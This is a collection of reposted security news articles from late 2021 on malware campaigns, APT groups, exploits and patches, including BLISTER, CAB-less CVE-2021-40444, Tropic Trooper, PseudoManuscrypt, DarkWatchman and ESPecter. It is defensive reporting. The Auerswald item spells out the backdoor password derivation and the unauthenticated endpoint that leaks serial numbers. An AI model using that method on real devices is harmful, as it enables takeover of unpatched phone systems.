Virus 2024 2023 2022 2021 2020
New BLISTER Malware Using Code Signing Certificates to Evade Detection
27.12.2021
Virus Thehackernews
Cybersecurity researchers have disclosed details of an evasive malware campaign
that makes use of valid code signing certificates to sneak past security
defenses and stay under the radar with the goal of deploying Cobalt Strike and
BitRAT payloads on compromised systems.
The binary, a loader, has been dubbed "Blister" by researchers from Elastic Security, with the malware samples having negligible to zero detections on VirusTotal. As of writing, the infection vector used to stage the attack, as well as the ultimate objectives of the intrusion, remains unknown.
A notable aspect of the attacks is that they leverage a valid code signing certificate issued by Sectigo. The malware has been observed signed with the certificate in question dating back to September 15, 2021. Elastic said it reached out to the company to ensure that the abused certificates are revoked.
"Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables," researchers Joe Desimone and Samir Bousseaden said. "Their use allows attackers to remain under the radar and evade detection for a longer period of time."
Blister masquerades as a legitimate library called "colorui.dll" and is
delivered via a dropper named "dxpo8umrzrr1w6gm.exe." Post execution, the loader
is designed to sleep for 10 minutes, likely in an attempt to evade sandbox
analysis, only to follow it up by establishing persistence and decrypting an
embedded malware payload such as Cobalt Strike or BitRAT.
"Once decrypted, the embedded payload is loaded into the current process or injected into a newly spawned WerFault.exe [Windows Error Reporting] process," the researchers noted. Additional indicators of compromise (IoCs) associated with the campaign can be accessed here.
New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML
Flaw
27.12.2021
Virus Thehackernews
A short-lived phishing
campaign has been observed taking advantage of a novel exploit that bypassed a
patch put in place by Microsoft to fix a remote code execution vulnerability
affecting the MSHTML component with the goal of delivering Formbook malware.
"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker," SophosLabs researchers Andrew Brandt and Stephen Ormandy said in a new report published Tuesday.
CVE-2021-40444 (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 Patch Tuesday updates, it has been put to use in multiple attacks ever since details pertaining to the flaw became public.
That same month, the technology giant uncovered a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs reported details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.
The new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available proof-of-concept Office exploit and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a "too-narrowly focused patch."
"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office
document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB)
file," the researchers explained. "When Microsoft's patch closed that loophole,
attackers discovered they could use a different attack chain altogether by
enclosing the maldoc in a specially crafted RAR archive."
CAB-less 40444, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host (WSH) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.
Consequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the Formbook malware payload from an attacker-controlled website.
As for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. "So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release," the researchers said.
"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases," SophosLabs Principal Researcher Andrew Brandt said. "Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button."
"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know," Brandt added. When reached for a response, a Microsoft spokesperson said "we are investigating these reports and will take appropriate action as needed to help keep customers protected."
Tropic Trooper Cyber Espionage Hackers Targeting Transportation Sector
27.12.2021
Virus Thehackernews
The transportation industry and government agencies related to the sector are
the victims of an ongoing campaign since July 2020 by a sophisticated and
well-equipped cyberespionage group in what appears to be yet another uptick in
malicious activities that are "just the tip of the iceberg."
"The group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories)," Trend Micro researchers Nick Dai, Ted Lee, and Vickie Su said in a report published last week.
Earth Centaur, also known by the monikers Pirate Panda and Tropic Trooper, is a long-running threat group focused on information theft and espionage that has led targeted campaigns against government, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong dating all the way back to 2011.
The hostile agents, believed to be a Chinese-speaking actor, are known for their use of spear-phishing emails with weaponized attachments to exploit known vulnerabilities, while simultaneously advancing their malicious tools with obfuscation, stealthiness, and striking power.
"This threat group is proficient at red teamwork," the researchers elaborated. "The group knows how to bypass security settings and keep its operation unobstructive. The usage of the open-source frameworks also allows the group to develop new backdoor variants efficiently."
In May 2020, the operators were observed fine-tuning their attack strategies with new behaviors by deploying a USB trojan dubbed USBFerry to strike physically isolated networks belonging to government institutions and military entities in Taiwan and the Philippines in a bid to siphon sensitive data through removable flash drives.
The latest multi-stage intrusion sequence detailed by Trend Micro involves the group turning to exploit vulnerable Internet Information Services (IIS) servers and Exchange server flaws as entry points to install a web shell that's then leveraged to deliver a .NET-based Nerapack loader and a first-stage backdoor known as Quasar on the compromised system.
From there, the attackers follow it up by dropping an arsenal of second-stage implants like ChiserClient, SmileSvr, ChiserClient, HTShell, and bespoke versions of Lilith RAT and Gh0st RAT depending on the victim to retrieve further instructions from a remote server, download additional payloads, perform file operations, execute arbitrary commands, and exfiltrate results back to the server.
It doesn't end there. After successful exploitation of the system, Tropic Trooper also attempts to breach the intranet, dump credentials, and wipe out event logs from the infected machines using a specific set of tools. Also put to use is a command-line program called Rclone that enables the actor to copy harvested data to different cloud storage providers.
"Currently, we have not discovered substantial damage to these victims as caused by the threat group," Trend Micro's analysts explained. "However, we believe that it will continue collecting internal information from the compromised victims and that it is simply waiting for an opportunity to use this data."
The findings are noteworthy because of the steps the advanced persistent threat (APT) takes to avoid detection and the critical nature of the targeted entities, not to mention the new capabilities developed for their malicious software to linger on infected hosts and avoid detection.
"The group can map their target's network infrastructure and bypass firewalls," the researchers said. "It uses backdoors with different protocols, which are deployed depending on the victim. It also has the capability to develop customized tools to evade security monitoring in different environments, and it exploits vulnerable websites and uses them as [command-and-control] servers."
Secret Backdoors Found in German-made Auerswald VoIP System
27.12.2021
Virus Thehackernews
Multiple backdoors have been discovered during a penetration test in the
firmware of a widely used voice over Internet Protocol (VoIP) appliance from
Auerswald, a German telecommunications hardware manufacturer, that could be
abused to gain full administrative access to the devices.
"Two backdoor passwords were found in the firmware of the COMpact 5500R PBX," researchers from RedTeam Pentesting said in a technical analysis published Monday. "One backdoor password is for the secret user 'Schandelah', the other can be used for the highest-privileged user 'admin.' No way was discovered to disable these backdoors."
The vulnerability has been assigned the identifier CVE-2021-40859 and carries a critical severity rating of 9.8. Following responsible disclosure on September 10, Auerswald addressed the problem in a firmware update (version 8.2B) released in November 2021. "Firmware Update 8.2B contains important security updates that you should definitely apply, even if you don't need the advanced features," the company said in a post without directly referencing the issue.
PBX, short for private branch exchange, is a switching system that serves a private organization. It's used to establish and control telephone calls between telecommunication endpoints, including customary telephone sets, destinations on the public switched telephone network (PSTN), and devices or services on VoIP networks.
RedTeam Pentesting said it uncovered the backdoor after it began to take a closer look into a service Auerswald provides in the event a customer were to lose access to their administrator account, in which case the password associated with the privileged account can be reset by reaching out to the manufacturer.
Specifically, the researchers found that the devices are configured to check for
a hard-coded username "Schandelah" besides "sub-admin," the account that's
necessary to manage the device according to the official documentation. "It
turns out that Schandelah is the name of a tiny village in northern Germany
where Auerswald produces their devices," the researchers said.
Follow-on investigation by the German pen-testing firm revealed that "the corresponding password for this username is derived by concatenating the PBX's serial number, the string 'r2d2,' and the current date [in the format 'DD.MM.YYYY'], hashing it with the MD5 hash algorithm and taking the first seven lower-case hex chars of the result."
Put simply, all an attacker needs to generate the password for the username
"Schandelah" is to obtain the serial number of the PBX — a piece of information
that can be trivially retrieved using an unauthenticated endpoint
("https://192.168.1[.]2/about_state"), enabling the bad actor to gain access to
a web interface that allows for resetting the administrator password.
On top of that, the researchers said they identified a second backdoor when the administrative username "admin" is passed, for which a fallback password is programmatically derived using the aforementioned algorithm, only difference being that a two-letter country code is suffixed to the concatenated string prior to creating the MD5 hash. The alternative password, as in the previous case, provides full-privileged access to the PBX without having to change the password in the first place.
"Using the backdoor, attackers are granted access to the PBX with the highest privileges, enabling them to completely compromise the device," the researchers said. "The backdoor passwords are not documented. They secretly coexist with a documented password recovery function supported by the vendor."
Experts Discover Backdoor Deployed on the U.S. Federal Agency's Network
20.12.2021
Virus Thehackernews
A U.S. federal government commission associated with international rights has been targeted by a backdoor that reportedly compromised its internal network in what the researchers described as a "classic APT-type operation."
"This attack could have given total visibility of the network and complete control of a system and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply," Czech security company Avast said in a report published last week.
The name of the federal entity was not disclosed, but reports from Ars Technica and The Record tied it to the U.S. Commission on International Religious Freedom (USCIRF). Avast said it was making its findings public after unsuccessful attempts to directly notify the agency about the intrusion and through other channels put in place by the U.S. government.
At this stage, only "parts of the attack puzzle" have been uncovered, leaving
the door open for a lot of unknowns with regards to the nature of the initial
access vector used to breach the network, the sequence of post-exploitation
actions taken by the actor, and the overall impact of the compromise itself.
What's known is that the attack was carried out in two stages to deploy two malicious binaries that enabled the unidentified adversary to intercept internet traffic and execute code of their choosing, permitting the operators to take complete control over the infected systems. It achieves this by abusing WinDivert, a legitimate packet capturing utility for Windows.
Interestingly, not only both the samples masquerade as an Oracle library named "oci.dll," the second-stage decryptor deployed during the attack was found to share similarities with another executable detailed by Trend Micro researchers in 2018, which delved into an information theft-driven supply chain attack dubbed "Operation Red Signature" aimed at organizations in South Korea. The overlaps have led the Avast Threat Intelligence Team to suspect that the attackers have had access to the source code of the latter.
"It is reasonable to presume that some form of data gathering and exfiltration of network traffic happened, but that is informed speculation," the researchers said. "That said, we have no way to know for sure the size and scope of this attack beyond what we've seen."
New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021
20.12.2021
Virus Thehackernews
Industrial and government organizations, including enterprises in the
military-industrial complex and research laboratories, are the targets of a new
malware botnet dubbed PseudoManyscrypt that has infected roughly 35,000 Windows
computers this year alone.
The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group's attack toolset, Kaspersky researchers said, characterizing the operation as a "mass-scale spyware attack campaign." The Russian cybersecurity company said it first detected the series of intrusions in June 2021.
At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.3%).
"The PseudoManuscrypt loader makes its way onto user systems via a MaaS platform that distributes malware in pirated software installer archives," the Kaspersky ICS CERT team said. "One specific case of the PseudoManuscrypt downloader's distribution is its installation via the Glupteba botnet."
Coincidentally, Glupteba's operations have also taken a significant hit after Google earlier this month disclosed that it acted to dismantle the botnet's infrastructure and it's pursuing a litigation against two Russian nationals, who are alleged to have managed the malware along with 15 other unnamed individuals.
Among the cracked installers that are used to fuel the botnet constitute Windows
10, Microsoft Office, Adobe Acrobat, Garmin, Call of Duty, SolarWinds Engineer's
Toolset, and even Kaspersky's own antivirus solution. The pirated software
installations are driven by a method called search poisoning in which the
attackers create malicious websites and use search engine optimization (SEO)
tactics to make them show up prominently in search results.
Once installed, PseudoManuscrypt comes with an array of intrusive capabilities that allows the attackers to full control of the infected system. This consists of disabling antivirus solutions, stealing VPN connection data, logging keystrokes, recording audio, capturing screenshots and videos of the screen, and intercepting data stored in the clipboard.
Kaspersky noted it has identified 100 different versions of the PseudoManuscrypt loader, with the earliest test variants dating back to March 27, 2021. Components of the trojan have been borrowed from commodity malware like Fabookie and a KCP protocol library employed by the China-based APT41 group for sending data back to the attackers' command-and-control (C2) servers.
The malware samples analyzed by the ICS CERT also featured comments written in Chinese and were found specifying Chinese as the preferred language when connecting to the C2 server, but these clues alone have been inconclusive to make an assessment about the malware's operators or their origins. Also unclear are the ultimate goals of the campaign, raising questions as to whether the attacks are financially motivated or state-backed.
"The large number of engineering computers attacked, including systems used for 3D and physical modeling, the development and use of digital twins raises the issue of industrial espionage as one of the possible objectives of the campaign," the researchers said.
New Fileless Malware Uses Windows Registry as Storage to Evade Detection
20.12.2021
Virus Thehackernews
A new JavaScript-based
remote access Trojan (RAT) propagated via a social engineering campaign has been
observed employing sneaky "fileless" techniques as part of its detection-evasion
methods to elude discovery and analysis.
Dubbed DarkWatchman by researchers from Prevailion's Adversarial Counterintelligence Team (PACT), the malware uses a resilient domain generation algorithm (DGA) to identify its command-and-control (C2) infrastructure and utilizes the Windows Registry for all of its storage operations, thereby enabling it to bypass antimalware engines.
The RAT "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith said, adding it "represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to operate beneath or around the detection threshold of most security tools."
Prevailion said that an unnamed enterprise-sized organization in Russia was one among the targeted victims, with a number of malware artifacts identified starting November 12, 2021. Given its backdoor and persistence features, the PACT team assessed that DarkWatchman could be an initial access and reconnaissance tool for use by ransomware groups.
An interesting consequence of this novel development is that it completely
obviates the need for ransomware operators to recruit affiliates, who are
typically in charge of dropping the file-locking malware and handling the file
exfiltration. Using DarkWatchman as a prelude for ransomware deployments also
equips the core developers of the ransomware with better oversight over the
operation beyond negotiating ransoms.
Distributed via spear-phishing emails that masquerade as "Free storage expiration notification" for a consignment delivered by Russian shipment company Pony Express, DarkWatchman provides a stealthy gateway for further malicious activity. The emails come attached with a purported invoice in the form of a ZIP archive that, in turn, contains the payload necessary to infect the Windows system.
The novel RAT is both a fileless JavaScript RAT and a C#-based keylogger, the latter of which is stored in the registry to avoid detection. Both the components are also extremely lightweight. The malicious JavaScript code just takes about 32kb, while the keylogger barely registers at 8.5kb.
"The storage of the binary in the registry as encoded text means that DarkWatchman is persistent yet its executable is never (permanently) written to disk; it also means that DarkWatchman's operators can update (or replace) the malware every time it's executed," the researchers said.
Once installed, DarkWatchman can execute arbitrary binaries, load DLL files, run JavaScript code and PowerShell commands, upload files to a remote server, update itself, and even uninstall the RAT and keylogger from the compromised machine. The JavaScript routine is also responsible for establishing persistence by creating a scheduled task that runs the malware at every user log on.
"The keylogger itself does not communicate with the C2 or write to disk," the researchers said. "Instead, it writes its keylog to a registry key that it uses as a buffer. During its operation, the RAT scrapes and clears this buffer before transmitting the logged keystrokes to the C2 server."
DarkWatchman has yet to be attributed to a hacking group, but Prevailion characterized the crew as a "capable threat actor," alongside pointing out the malware's exclusive targeting of victims located in Russia and the typographical errors and misspellings that were identified in the source code samples, raising the possibility that the operators may not be native English speakers.
"It would appear that the authors of DarkWatchman identified and took advantage of the complexity and opacity of the Windows Registry to work underneath or around the detection threshold of security tools and analysts alike," the researchers concluded. "Registry changes are commonplace, and it can be difficult to identify which changes are anomalous or outside the scope of normal OS and software functions."
Microsoft Issues Windows Update to Patch 0-Day Used to Spread Emotet Malware
17.12.2021
Virus Thehackernews
Microsoft has rolled out Patch Tuesday updates to address multiple security vulnerabilities in Windows and other software, including one actively exploited flaw that's being abused to deliver Emotet, TrickBot, or Bazaloader malware payloads.
The latest monthly release for December fixes a total of 67 flaws, bringing the total number of bugs patched by the company this year to 887, according to the Zero Day Initiative. Seven of the 67 flaws are rated Critical and 60 are rated as Important in severity, with five of the issues publicly known at the time of release. It's worth noting that this is in addition to the 21 flaws resolved in the Chromium-based Microsoft Edge browser.
The most critical of the lot is CVE-2021-43890 (CVSS score: 7.1), a Windows AppX installer spoofing vulnerability that Microsoft said could be exploited to achieve arbitrary code execution. The lower severity rating is indicative of the fact that code execution hinges on the logged-on user level, meaning "users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."
The Redmond-based tech giant noted that an adversary could leverage the flaw by crafting a malicious attachment that's then used as part of a phishing campaign to trick the recipients into opening the email attachment. Sophos security researchers Andrew Brandt as well as Rick Cole and Nick Carr of the Microsoft Threat Intelligence Center (MSTIC) have been credited with reporting the vulnerability.
"Microsoft is aware of attacks that attempt to exploit this vulnerability by using specially crafted packages that include the malware family known as Emotet/ Trickbot/ Bazaloader," the company further added. The development comes as Emotet malware campaigns are witnessing a surge in activity after more than a 10-month-long hiatus following a coordinated law enforcement effort to disrupt the botnet's reach.
Other flaws that are publicly known are below —
CVE-2021-43240 (CVSS score: 7.8) - NTFS Set Short Name Elevation of Privilege
Vulnerability
CVE-2021-43883 (CVSS score: 7.8) - Windows Installer Elevation
of Privilege Vulnerability
CVE-2021-41333 (CVSS score: 7.8) - Windows Print
Spooler Elevation of Privilege Vulnerability
CVE-2021-43893 (CVSS score: 7.5)
- Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability
CVE-2021-43880 (CVSS score: 5.5) - Windows Mobile Device Management Elevation of
Privilege Vulnerability
The December patch also comes with remediations for
10 remote code execution flaws in Defender for IoT, in addition to critical bugs
affecting iSNS Server (CVE-2021-43215), 4K Wireless Display Adapter
(CVE-2021-43899), Visual Studio Code WSL Extension (CVE-2021-43907), Office app
(CVE-2021-43905), Windows Encrypting File System (CVE-2021-43217), Remote
Desktop Client (CVE-2021-43233), and SharePoint Server (CVE-2021-42309).
Software Patches From Other Vendors
Besides Microsoft, security updates have
also been released by other vendors to rectify several vulnerabilities,
including —
Adobe
Android
Apple
Cisco
Citrix
Intel
Linux distributions
Oracle Linux, Red Hat, and SUSE
SAP
Schneider Electric, and
Siemens
Furthermore, numerous security advisories have been released by dozens of
companies for the actively exploited Log4j remote code execution vulnerability
that could allow a complete takeover of affected systems.
Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan
17.12.2021
Virus Thehackernews
Infection chains associated
with the multi-purpose Qakbot malware have been broken down into "distinct
building blocks," an effort that Microsoft said will help to proactively detect
and block the threat in an effective manner.
The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a "customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it."
Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns.
First discovered in 2007, the modular malware — like TrickBot — has evolved from its early roots as a banking trojan to become a Swiss Army knife capable of data exfiltration and acting as a delivery mechanism for the second stage payloads, including ransomware. Also notable is its tactic of hijacking victims' legitimate email threads from Outlook clients via an Email Collector component and using those threads as phishing lures to infect other machines.
"Compromising IMAP services and email service providers (ESPs), or hijacking
email threads allows attackers to leverage the trust a potential victim has in
people they have corresponded with before, and it also allows for the
impersonation of a compromised organization," Trend Micro researchers Ian
Kenefick and Vladimir Kropotov detailed last month. "Indeed, intended targets
will be much more likely to open emails from a recognized sender."
Qakbot activity tracked by the cybersecurity firm over a seven month period between March 25, 2021, and October 25, 2021, show that the U.S., Japan, Germany, India, Taiwan, Italy, South Korea, Turkey, Spain, and France are the top targeted countries, with the intrusions primarily striking telecommunications, technology, and education sectors.
More recently, spam campaigns have resulted in the deployment of a new loader called SQUIRRELWAFFLE that enables the attackers to gain an initial foothold into enterprise networks and drop malicious payloads, such as Qakbot and Cobalt Strike, on infected systems.
Now according to Microsoft, attack chains involving Qakbot comprise of several
building blocks that chart the various stages of the compromise, right from the
methods adopted to distribute the malware — links, attachments, or embedded
images — before carrying out an array of post-exploitation activities such as
credential theft, email exfiltration, lateral movement, and the deployment of
Cobalt Strike beacons and ransomware.
The Redmond-based company noted that Qakbot-related emails sent by the attackers may, at times, come with a ZIP archive file attachment that includes a spreadsheet containing Excel 4.0 macros, an initial access vector that's widely abused in phishing attacks. Regardless of the mechanism employed to deliver the malware, the campaigns have in common their use of malicious Excel 4.0 macros.
While macros are turned off by default in Microsoft Office, recipients of the email messages are prompted to enable the macro to view the document's actual content. This triggers the next phase of the onslaught to download the malicious payloads from one or more attacker-controlled domains.
More often than not, Qakbot is just the first step in what's part of a larger attack, with the threat actors using the initial foothold facilitated by the malware to install additional payloads or sell the access to the highest bidder on underground forums who can then leverage it for their own ends. In June 2021, enterprise security company Proofpoint revealed how ransomware actors are increasingly shifting from using email messages as an intrusion route to purchasing access from cybercriminal enterprises that have already infiltrated major entities.
"Qakbot's modularity and flexibility could pose a challenge for security analysts and defenders because concurrent Qakbot campaigns could look strikingly different on each affected device, significantly impacting how these defenders respond to such attacks," the researchers said. "Therefore, a deeper understanding of Qakbot is paramount in building a comprehensive and coordinated defense strategy against it."
Indian-Made Mobile Spyware Targeted Human Rights Activist in Togo
13.10.21
Virus
Thehackernews
A prominent Togolese human rights defender has been targeted with spyware by a threat actor known for striking victims in South Asia, marking the hacking group's first foray into digital surveillance in Africa.
Amnesty International tied the covert attack campaign to a collective tracked as "Donot Team" (aka APT-C-35), which has been linked to cyber offensives in India and Pakistan, while also identifying apparent evidence coupling the group's infrastructure to an Indian company called Innefu Labs. The unnamed activist is believed to have targeted over a period of two months starting in December 2019 with the help of fake Android applications and spyware-loaded emails.
"The persistent attacks over WhatsApp and email tried to trick the victim into installing a malicious application that masqueraded as a secure chat application," Amnesty International said in a report published last week. "The application was in fact a piece of custom Android spyware designed to extract some of the most sensitive and personal information stored on the activist's phone."
The messages originated from a WhatsApp account associated with an Indian phone number that's registered in the state of Jammu and Kashmir. Once installed, the malicious software — which takes the form of an app named "ChatLite" — grants the adversary permissions to access the camera and microphone, gather photos and files stored on the device, and even grab WhatsApp messages as they are being sent and received.
But when the aforementioned attempt failed, the attackers switched to an
alternate infection chain in which an email sent from a Gmail account contained
a malware-laced Microsoft Word document that leveraged a now-patched remote code
execution vulnerability (CVE-2017-0199) to drop a full-fledged Windows spying
tool known as the YTY framework that grants complete access to the victim's
machine.
"The spyware can be used to steal files from the infected computer and any connected USB drives, record keystrokes, take regular screenshots of the computer, and download additional spyware components," the researchers said.
Although Innefu Labs has not been directly implicated in the incident, Amnesty International said it discovered a domain ("server.authshieldserver.com") that pointed to an IP address (122.160.158[.]3) used by the Delhi-based cybersecurity company. In a statement shared with the non-governmental organization, Innefu Labs denied any connection to the Donot Team APT, adding "they are not aware of any use of their IP address for the alleged activities."
We have reached out to the company for further comment, and we will update the story if we hear back.
"The worrying trend of private companies actively performing unlawful digital surveillance increases the scope for abuse while reducing avenues for domestic legal redress, regulation, and judicial control," Amnesty said. "The nature of cross-border commercial cyber surveillance where the surveillance targets, the operators, the end customer, and the attack infrastructure can all be located in different jurisdictions creates significant impediments to achieving remediation and redress for human rights abuses."
Researchers Warn of FontOnLake Rootkit Malware Targeting Linux Systems
9.10.21
Virus
Thehackernews
Cybersecurity
researchers have detailed a new campaign that likely targets entities in
Southeast Asia with a previously unrecognized Linux malware that's engineered to
enable remote access to its operators, in addition to amassing credentials and
function as a proxy server.
The malware family, dubbed "FontOnLake" by Slovak cybersecurity firm ESET, is said to feature "well-designed modules" that are continuously being upgraded with new features, indicating an active development phase. Samples uploaded to VirusTotal point to the possibility that the very first intrusions utilizing this threat have been happening as early as May 2020.
Avast and Lacework Labs are tracking the same malware under the moniker HCRootkit.
"The sneaky nature of FontOnLake's tools in combination with advanced design and low prevalence suggest that they are used in targeted attacks," ESET researcher Vladislav Hrčka said. "To collect data or conduct other malicious activity, this malware family uses modified legitimate binaries that are adjusted to load further components. In fact, to conceal its existence, FontOnLake's presence is always accompanied by a rootkit. These binaries are commonly used on Linux systems and can additionally serve as a persistence mechanism."
FontOnLake's toolset includes three components that consist of trojanized versions of legitimate Linux utilities that are used to load kernel-mode rootkits and user-mode backdoors, all of which communicate with one another using virtual files. The C++-based implants themselves are designed to monitor systems, secretly execute commands on networks, and exfiltrate account credentials.
A second permutation of the backdoor also comes with capabilities to act as a
proxy, manipulate files, download arbitrary files, while a third variant,
besides incorporating features from the other two backdoors, is equipped to
execute Python scripts and shell commands.
ESET said it found two different versions of the Linux rootkit that's based on an open-source project called Suterusu and share overlaps in functionality, including hiding processes, files, network connections, and itself, while also being able to carry out file operations, and extract and execute the user-mode backdoor.
It's currently not known how the attackers gain initial access to the network, but the cybersecurity company noted that the threat actor behind the attacks is "overly cautious" to avoid leaving any tracks by relying on different, unique command-and-control (C2) servers with varying non-standard ports. All the C2 servers observed in the VirusTotal artifacts are no longer active.
"Their scale and advanced design suggest that the authors are well versed in cybersecurity and that these tools might be reused in future campaigns," Hrčka said. "As most of the features are designed just to hide its presence, relay communication, and provide backdoor access, we believe that these tools are used mostly to maintain an infrastructure which serves some other, unknown, malicious purposes."
Researchers Discover UEFI Bootkit Targeting Windows Computers Since 2012
9.10.21
Virus
Thehackernews
Cybersecurity researchers on Tuesday revealed details of a previously
undocumented UEFI (Unified Extensible Firmware Interface) bootkit that has been
put to use by threat actors to backdoor Windows systems as early as 2012 by
modifying a legitimate Windows Boot Manager binary to achieve persistence, once
again demonstrating how technology meant to secure the environment prior to
loading the operating system is increasingly becoming a "tempting target."
Slovak cybersecurity firm ESET codenamed the new malware "ESPecter" for its ability to persist on the EFI System Partition (ESP), in addition to circumventing Microsoft Windows Driver Signature Enforcement to load its own unsigned driver that can be used to facilitate espionage activities such as document theft, keylogging, and screen monitoring by periodically capturing screenshots. The intrusion route of the malware remains unknown as yet.
"ESPecter shows that threat actors are relying not only on UEFI firmware implants when it comes to pre-OS persistence and, despite the existing security mechanisms like UEFI Secure Boot, invest their time into creating malware that would be easily blocked by such mechanisms, if enabled and configured correctly," ESET researchers Martin Smolár and Anton Cherepanov said in a technical write-up published Tuesday.
ESPecter's roots can be traced back to at least 2012, originating as a bootkit for systems with legacy BIOSes, with its authors continuously adding support for new Windows OS versions while barely making any changes to the malware's modules. The biggest change arrived in 2020 when "those behind ESPecter apparently decided to move their malware from legacy BIOS systems to modern UEFI systems."
The development marks the fourth time real-world cases of UEFI malware have been discovered so far, following LoJax, MosaicRegressor, and most recently FinFisher, the last of which was found leveraging the same method of compromise to persist on the ESP in the form of a patched Windows Boot Manager.
"By patching the Windows Boot Manager, attackers achieve execution in the early
stages of the system boot process, before the operating system is fully loaded,"
the researchers said. "This allows ESPecter to bypass Windows Driver Signature
Enforcement (DSE) in order to execute its own unsigned driver at system
startup."
However, on systems that support Legacy BIOS Boot Mode, ESPecter gains persistence by altering the master boot record (MBR) code located in the first physical sector of the disk drive to interfere with the loading of the boot manager and load the malicious kernel driver, which is designed to load additional user-mode payloads and set up the keylogger, before erasing its own traces from the machine.
Regardless of the MBR or UEFI variant used, the deployment of the driver leads to the injection of next-stage user-mode components into specific system processes to establish communications with a remote server, thereby enabling an attacker to commandeer the compromised machine and take over control, not to mention download and execute more malware or commands fetched from the server.
ESET did not attribute the bootkit to a particular nation-state or hacking group, but the use of Chinese debug messages in the user-mode client payload has raised the possibility that it could be the work of an unknown Chinese-speaking threat actor.
"Even though Secure Boot stands in the way of executing untrusted UEFI binaries from the ESP, over the last few years we have been witness to various UEFI firmware vulnerabilities affecting thousands of devices that allow disabling or bypassing Secure Boot," the researchers noted. "This shows that securing UEFI firmware is a challenging task and that the way various vendors apply security policies and use UEFI services is not always ideal."
New Study Links Seemingly Disparate Malware Attacks to Chinese Hackers
9.10.21 Virus
Thehackernews
Chinese cyber espionage group APT41 has been linked to seemingly disparate
malware campaigns, according to fresh research that has mapped together
additional parts of the group's network infrastructure to hit upon a
state-sponsored campaign that takes advantage of COVID-themed phishing lures to
target victims in India.
"The image we uncovered was that of a state-sponsored campaign that plays on people's hopes for a swift end to the pandemic as a lure to entrap its victims," the BlackBerry Research and Intelligence team said in a report shared with The Hacker News. "And once on a user's machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic."
APT41 (aka Barium or Winnti) is a moniker assigned to a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in conjunction with financially motivated operations for personal gain as far back as 2012. Calling the group "Double Dragon" for its twin objectives, Mandiant (formerly FireEye) pointed out the collective's penchant for striking healthcare, high-tech, and telecommunications sectors for establishing long-term access and facilitating the theft of intellectual property.
In addition, the group is known for staging cybercrime intrusions that are aimed at stealing source code and digital certificates, virtual currency manipulation, and deploying ransomware, as well as executing software supply chain compromises by injecting malicious code into legitimate files prior to distribution of software updates.
The latest research by BlackBerry builds on previous findings by Mandiant in March 2020, which detailed a "global intrusion campaign" unleashed by APT41 by exploiting a number of publicly known vulnerabilities affecting Cisco and Citrix devices to drop and execute next-stage payloads that were subsequently used to download a Cobalt Strike Beacon loader on compromised systems. The loader was notable for its use of a malleable command-and-control (C2) profile that allowed the Beacon to blend its network communications with a remote server into legitimate traffic originating from the victim network.
BlackBerry, which found a similar C2 profile uploaded to GitHub on March 29 by a Chinese security researcher with the pseudonym "1135," used the metadata configuration information to identify a fresh cluster of domains related to APT41 that attempt to masquerade Beacon traffic look like legitimate traffic from Microsoft sites, with IP address and domain name overlaps found in campaigns linked to the Higaisa APT group and that of Winnti disclosed over the past year.
A follow-on investigation into the URLs revealed as many as three malicious PDF files that reached out to one of the newly discovered domains that had also previously hosted a Cobalt Strike Team Server. The documents, likely used along phishing emails as an initial infection vector, claimed to be COVID-19 advisories issued by the government of India or contain information regarding the latest income tax legislation targeting non-resident Indians.
The spear-phishing attachments appear in the form of .LNK files or .ZIP archives, which, when opened, result in the PDF document being displayed to the victim, while, in the background, the infection chain leads to the execution of a Cobalt Strike Beacon. Although a set of intrusions using similar phishing lures and uncovered in September 2020 were pinned on the Evilnum group, BlackBerry said the compromise indicators point to an APT41-affiliated campaign.
